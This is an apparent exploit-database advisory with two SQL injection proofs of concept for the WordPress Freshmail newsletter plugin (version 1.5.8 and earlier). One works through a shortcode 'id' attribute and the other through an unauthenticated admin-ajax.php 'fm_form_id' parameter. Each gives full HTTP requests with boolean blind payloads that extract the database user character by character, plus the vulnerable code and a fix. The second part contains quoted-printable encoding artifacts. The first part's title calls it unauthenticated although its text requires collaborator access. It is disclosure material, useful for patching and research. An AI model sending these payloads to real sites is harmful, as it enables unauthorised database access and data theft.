------------------------
ISSUE 1:


# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.
 
A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.
 
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
 
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/shortcode.php, lines 27 and 120:
 
Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
 
 
3. Proof of concept
---------------------------
 
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
 
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
 
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
 
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
 
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
 
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
 
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
 
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
 
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
 
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
 
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
 
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
 
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
 
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
 
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
 
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL--
 
 
5. Solution
---------------
 
Update to version 1.6


------------------------
ISSUE 2:

# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
 
- 05/05/2015: Response from the developer.
        - 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
 
[...]
Line 28:  add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29:  add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
[...]
 
3. Proof of concept
---------------------------
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
 
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
 
4. Explanation
---------------------
 
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
ar
to:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
 
The second time he tries to do the same with the same email the message
returned will be:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
 
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
me
message  indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".
 
5. Solution
---------------
 
Update to version 1.6